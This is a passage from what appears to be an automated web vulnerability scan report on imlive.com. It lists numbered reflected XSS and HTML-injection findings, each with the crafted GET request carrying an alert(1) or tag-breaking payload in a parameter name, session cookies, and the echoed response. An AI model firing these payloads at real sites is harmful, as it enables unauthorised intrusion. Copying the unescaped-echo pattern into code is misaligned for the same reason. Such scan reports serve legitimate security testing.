Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:37 GMT
Connection: close
Content-Length: 32369
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hotfeatures.aspx&he=imlive.com&ul=/live-sex-chats/sex-video-features/?80442'-alert(1)-'ebd4ed614b9=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined'
...[SNIP]...

4.546. http://imlive.com/live-sex-chats/shemale-couple/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /live-sex-chats/shemale-couple/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52e5c"><a>069e897b555 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /live-sex-chats/shemale-couple/?52e5c"><a>069e897b555=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:23:34 GMT
Connection: close
Content-Length: 92559
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<a href="/live-sex-chats/shemale-couple/?52e5c"><a>069e897b555=1">
...[SNIP]...

4.547. http://imlive.com/live-sex-chats/shemale-couple/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/shemale-couple/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9f758'-alert(1)-'be71a5fa912 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/shemale-couple/?9f758'-alert(1)-'be71a5fa912=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:06 GMT
Connection: close
Content-Length: 92716
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/shemale-couple/?9f758'-alert(1)-'be71a5fa912=1&qs=cat=1^roomid=557^9f758'-alert(1)-'be71a5fa912=1&qs=cat=1^roomid=557^9f758'-alert(1)-'be71a5fa912=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63
...[SNIP]...

4.548. http://imlive.com/live-sex-chats/shemale/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/shemale/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b7464'-alert(1)-'af09ad182b3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/shemale/?b7464'-alert(1)-'af09ad182b3=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:23:31 GMT
Connection: close
Content-Length: 224765
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/shemale/?b7464'-alert(1)-'af09ad182b3=1&qs=cat=1^roomid=51^b7464'-alert(1)-'af09ad182b3=1&qs=cat=1^roomid=51^b7464'-alert(1)-'af09ad182b3=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eb
...[SNIP]...

4.549. http://imlive.com/live-sex-chats/shemale/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /live-sex-chats/shemale/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8242"><a>b60847be956 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /live-sex-chats/shemale/?f8242"><a>b60847be956=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:23:15 GMT
Connection: close
Content-Length: 224539
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<a href="/live-sex-chats/shemale/?f8242"><a>b60847be956=1">
...[SNIP]...

4.550. http://imlive.com/live-sex-chats/shy-girl/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/shy-girl/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload df49d'-alert(1)-'469a7a377c8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/shy-girl/?df49d'-alert(1)-'469a7a377c8=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:20:40 GMT
Connection: close
Content-Length: 171563
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/shy-girl/?df49d'-alert(1)-'469a7a377c8=1&qs=cat=1^roomid=160^df49d'-alert(1)-'469a7a377c8=1&qs=cat=1^roomid=160^df49d'-alert(1)-'469a7a377c8=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63
...[SNIP]...

4.551. http://imlive.com/live-sex-chats/shy-girl/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /live-sex-chats/shy-girl/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b1a0"><a>61a08cd9cef was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /live-sex-chats/shy-girl/?3b1a0"><a>61a08cd9cef=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:20:23 GMT
Connection: close
Content-Length: 171425
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<a href="/live-sex-chats/shy-girl/?3b1a0"><a>61a08cd9cef=1">
...[SNIP]...

4.552. http://imlive.com/liveexperts.asp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /liveexperts.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 42604'><a>750b6f3eb7b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /liveexperts.asp?42604'><a>750b6f3eb7b=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:13:10 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmsTHmj4p7KUq0DeR%2BO3xTkb; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:13:10 GMT
Connection: close
Content-Length: 19420
Vary: Accept-Encoding


<html>
   <head>
       <title>live webcam video chat with experts at imlive</title>
       <meta name="description" content="Live video chat sessions with experts in just about anything - Mysticism & Spir
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/liveexperts.asp?42604'><a>750b6f3eb7b=1&lr=1107816009&ud=0&pe=liveexperts.asp&qs=42604'>
...[SNIP]...

4.553. http://imlive.com/localcompanionship.asp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /localcompanionship.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d9f12'><a>f87a2832891 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /localcompanionship.asp?d9f12'><a>f87a2832891=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:13:12 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmuTmCT55rdh7t3zZ04MFTzw; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:13:12 GMT
Connection: close
Content-Length: 16579
Vary: Accept-Encoding


<html>
   <head>
       <title>Friends & Romance on Webcam Video Chat at ImLive</title>
       <meta name="description" content="Like shopping? Go out to restaurants? Find your soul mate on live webcam vid
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/localcompanionship.asp?d9f12'><a>f87a2832891=1&lr=1107816009&ud=0&pe=localcompanionship.asp&qs=d9f12'>
...[SNIP]...

4.554. http://imlive.com/minglesingles.asp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /minglesingles.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1a452'><a>a6955adbf25 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /minglesingles.asp?1a452'><a>a6955adbf25=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
